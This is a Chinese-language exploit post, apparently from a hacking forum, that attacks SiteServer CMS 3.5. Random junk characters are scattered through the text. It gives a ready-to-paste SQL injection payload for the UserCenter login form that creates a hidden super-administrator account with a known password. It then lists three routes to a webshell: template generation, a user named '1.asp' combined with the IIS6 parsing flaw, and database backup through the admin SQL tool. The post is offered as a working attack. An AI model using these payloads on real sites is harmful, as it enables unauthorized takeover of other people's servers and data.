经测试秒杀最新的3.5版# d3 T- |1 l" M0 G
stieserver官网:www.siteserver.cn
1 y' S6 o" C4 I! }EXP:
9 {# A8 ^& R3 m; M2 l' g; l; G直接访问UserCenter/login.aspx
9 @* J6 p9 e1 C" K f( e) R用户名处输入:5 V5 F+ F z3 X5 w. |
% C. E6 j8 x; [' ^123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–! U9 _. ]0 R1 n9 ]6 D1 }' b
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。$ ?/ Y+ l# m9 A$ z
之后再访问后台SiteServer/login.aspx用插入的用户登陆; F( Y* `2 C; Q1 d- b( V
后台拿webshell的三种方法:4 z. P( A' o& ^' K# b6 a
一、7 G% ?" }- g0 t3 h# D5 Q' m
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
L; `, [0 Y- h* }二、( w1 s4 `. C7 ^$ X( z0 e# R, ]
成员权限-》添加用户-》用户名为:1.asp; |7 F/ l7 K" E. \$ I+ x9 ^
http://127.0.0.1/usercenter/8 z- E+ B% P- o+ j
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
, y7 Q( q( ~) M(ps:后台添加用户时不会验证是否含有非法字符)0 o$ g6 N0 }9 ~2 D# n& Z6 ], D
三、% } M$ K9 N3 y2 W8 Z! Y. `
系统工具-》实用工具-》机器参数查看
7 B6 Q. Z; E6 |' a" }可以看到数据库类型、名称,WEB路径, z9 W$ w& z; |5 u3 [
系统工具-》数据库工具-》SQL语句查询
" r. w! E! g& Y8 e P这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |